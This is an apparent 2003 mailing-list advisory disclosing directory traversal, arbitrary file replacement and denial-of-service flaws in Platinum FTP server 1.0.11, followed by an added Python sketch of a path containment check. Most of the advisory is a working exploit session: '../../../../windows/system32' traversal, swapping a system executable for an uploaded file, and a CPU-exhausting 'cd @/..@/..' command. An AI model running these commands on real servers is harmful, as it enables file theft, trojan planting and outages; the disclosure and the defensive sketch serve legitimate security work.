

Vulnerability for Platinum FTP version 1.0.11


Date: 24 Feb 2003 09:26:56 -0000
From: Pui Kin Ser <[email protected]>
To: [email protected]
Subject: Vulnerability for Platinum FTP version 1.0.11



Vulnerability in PlatinumFTPserver V1.0.11

Vendor: 	PlatinumFTPserver (C)2002 BYTE/400 LTD
                                        
Discovered by:	SER Pui Kin, Hong Kong
              	[email protected]

Date:		24 Feb 2003

Summary
-------------------
Platinum FTP server does not stop users from traversing the file system outside the FTP root directory "/". Moreover, an anonymous user can retrieve or replace any file on the FTP server, so a Trojan horse can easily be installed on the affected server. The DoS vulnerability reported by Dennis Rand for Platinum v1.0.7 has still not been fixed in v1.0.11.

Details
-------------------
Versions affected:
* PlatinumFTPServer version 1.0.10, version 1.0.11

Demonstration
-------------------
C:\testing>ftp localhost
Connected to ibm-kin.
220-PlatinumFTPserver V1.0.11
220-PlatinumFTPserver (C)2002 BYTE/400 LTD
220-
220 Enter login details
User (ibm-kin:(none)): anonymous
331 Password required for anonymous.
Password:
230-Send comments to [email protected]
230-Date 2/24/2003, Time 9:56:07 AM.
230 Storage available 8,671,645,696 Bytes.
ftp> dir
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
-rwxr-xr-x 1 User Group 28 Feb 24 09:59 cmd3.exe
226 Listing complete.
ftp: 67 bytes received in 0.00Seconds 67000.00Kbytes/sec.
ftp> pwd
257 "/" is current directory.
ftp> dir \..
200 PORT command successful
500 /. or \. reference not allowed for security reasons.

########################################################
## To retrieve file directory information out of the FTP root directory
########################################################
ftp> dir ..
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
-rwxr-xr-x 1 User Group 1406 Oct 10 23:38 3.ico
drwxr-xr-x 1 User Group 0 Feb 24 09:54 Backup
-rwxr-xr-x 1 User Group 90112 Aug 26 22:15 Clean.exe
-rwxr-xr-x 1 User Group 418816 Feb 22 06:19 Console.exe
-rwxr-xr-x 1 User Group 198315 Sep 3 03:47 FtpObjectHelp.chm
-rwxr-xr-x 1 User Group 46592 Dec 12 06:58 InstallService.exe
-rwxr-xr-x 1 User Group 15431 Jul 8 17:52 License.rtf
drwxr-xr-x 1 User Group 0 Feb 24 09:56 logs
-rwxr-xr-x 1 User Group 3224767 Jan 4 23:03 PlatinumFTPserver.chm
-rwxr-xr-x 1 User Group 141312 Feb 22 06:22 PlatinumFTPserverEngine.exe
-rwxr-xr-x 1 User Group 7406 Jul 19 23:51 Readme.ico
-rwxr-xr-x 1 User Group 27109 Feb 22 20:12 Readme.rtf
-rwxr-xr-x 1 User Group 69 Feb 22 11:54 reg.bat
-rwxr-xr-x 1 User Group 69904 Jun 24 18:02 RegPatch.exe
-rwxr-xr-x 1 User Group 43581 Feb 22 07:37 Releasenotes.rtf
drwxr-xr-x 1 User Group 0 Feb 24 10:04 root
-rwxr-xr-x 1 User Group 201728 Dec 11 07:09 ScriptEditor.exe
drwxr-xr-x 1 User Group 0 Feb 24 09:54 Scripts
-rwxr-xr-x 1 User Group 3036 Sep 1 15:37 TIPOFDAY.TXT
-rwxr-xr-x 1 User Group 468490 Jul 8 17:53 vbscript.chm
-rwxr-xr-x 1 User Group 61952 Aug 29 13:16 ViewLog.exe
-rwxr-xr-x 1 User Group 89600 Nov 23 04:00 ZipManager.exe
-rwxr-xr-x 1 User Group 92595 Sep 3 03:02 ZipObjectHelp.chm
226 Listing complete.
ftp: 1634 bytes received in 0.00Seconds 1634000.00Kbytes/sec.
ftp> dir ../../../../windows/system32/cmd*
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
-rwxr-xr-x 1 User Group 375808 Aug 18 20:00 cmd.exe
-rwxr-xr-x 1 User Group 375808 Aug 18 20:00 cmd2.exe
-rwxr-xr-x 1 User Group 324608 Aug 29 18:40 cmdial32.dll
-rwxr-xr-x 1 User Group 41472 Aug 29 18:41 cmdl32.exe
-rwxr-xr-x 1 User Group 40505 Aug 18 20:00 cmdlib.wsc
226 Listing complete.
ftp: 342 bytes received in 0.00Seconds 342000.00Kbytes/sec.

########################################################
## To get the file cmd2.exe out of the FTP root
########################################################
ftp> get ../../../../windows/system32/cmd2.exe
200 PORT command successful
550 ../../../../windows/system32/cmd2.exe: No such file or directory.
ftp> dir
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
-rwxr-xr-x 1 User Group 28 Feb 24 09:59 cmd3.exe
226 Listing complete.
ftp: 67 bytes received in 0.00Seconds 67000.00Kbytes/sec.
ftp> rename ../../../../windows/system32/cmd2.exe
To name cmd2.exe
350 Command OK - waiting for name
250 File/dir renamed to \cmd2.exe
ftp> dir
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
-rwxr-xr-x 1 User Group 375808 Aug 18 20:00 cmd2.exe
-rwxr-xr-x 1 User Group 28 Feb 24 09:59 cmd3.exe
226 Listing complete.
ftp: 134 bytes received in 0.00Seconds 134000.00Kbytes/sec.

########################################################
## To replace cmd2.exe with the anonymous user's program cmd3.exe
########################################################
ftp> rename cmd3.exe
To name ../../../../windows/system32/cmd2.exe
350 Command OK - waiting for name
250 File/dir renamed to \..\..\..\..\windows\system32\cmd2.exe
ftp> dir ../../../../windows/system32/cmd*
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
-rwxr-xr-x 1 User Group 375808 Aug 18 20:00 cmd.exe
-rwxr-xr-x 1 User Group 28 Feb 24 09:59 cmd2.exe
-rwxr-xr-x 1 User Group 324608 Aug 29 18:40 cmdial32.dll
-rwxr-xr-x 1 User Group 41472 Aug 29 18:41 cmdl32.exe
-rwxr-xr-x 1 User Group 40505 Aug 18 20:00 cmdlib.wsc
226 Listing complete.
ftp: 342 bytes received in 0.00Seconds 342000.00Kbytes/sec.
ftp>

########################################################
## To create a directory out of the FTP root
########################################################
ftp> pwd
257 "/" is current directory.
ftp> mkdir ../testing1
257 ../testing1 directory created

########################################################
## To DoS the FTP server. CPU will be 100% utilized
########################################################
ftp> cd @/..@/..
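
Added example (not part of the original advisory and not the vendor's code): the session shows `dir \..` refused while `dir ..` and the `rename` arguments are accepted, which is what a check on the leading characters alone would produce. The sketch below puts such a hypothetical prefix filter beside a containment check that resolves each argument against the FTP root before use. `FTP_ROOT` is a constructed placeholder path, and all function names are assumptions.

```python
import ntpath  # Windows path rules, usable on any OS

FTP_ROOT = r"C:\srv\ftp\example\root"  # constructed placeholder, not from the advisory

def naive_prefix_filter(arg: str) -> bool:
    """Hypothetical filter: refuse only arguments that begin with '/.' or '\\.'.
    Modelled on the 500 reply in the transcript; not the vendor's code."""
    return not arg.startswith(("/.", "\\."))

def resolve_in_root(root: str, cwd: str, arg: str) -> str:
    """Map a client-supplied FTP path to a real path, or raise if it leaves root."""
    arg, cwd = arg.replace("/", "\\"), cwd.replace("/", "\\")
    base = "" if arg.startswith("\\") else cwd  # leading slash means virtual root
    rel = (base + "\\" + arg).strip("\\")
    real = ntpath.normpath(ntpath.join(root, rel))  # collapses every '..'
    root_n = ntpath.normcase(ntpath.normpath(root))
    real_n = ntpath.normcase(real)
    # Compare on a separator boundary so ...\root2 is not taken for ...\root.
    if real_n != root_n and not real_n.startswith(root_n + "\\"):
        raise PermissionError(f"{arg!r} resolves outside the FTP root")
    return real

def check_rename(root: str, cwd: str, src: str, dst: str) -> tuple[str, str]:
    """RNFR/RNTO: both the source and the destination must stay inside root."""
    return resolve_in_root(root, cwd, src), resolve_in_root(root, cwd, dst)

def is_allowed(arg: str, cwd: str = "/") -> bool:
    """True when the argument resolves to a path inside FTP_ROOT."""
    try:
        resolve_in_root(FTP_ROOT, cwd, arg)
        return True
    except PermissionError:
        return False

if __name__ == "__main__":
    # Arguments from the session above, plus two in-root paths (constructed).
    for arg in ["\\..", "..", "../../../../windows/system32/cmd2.exe",
                "../testing1", "cmd3.exe", "sub/../cmd3.exe"]:
        print(f"{arg!r:45} prefix-filter={naive_prefix_filter(arg)!s:5} "
              f"containment={is_allowed(arg)}")
```

The containment check is purely lexical; a server applying it should also resolve junctions and symbolic links on the final path before comparing it with the root.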
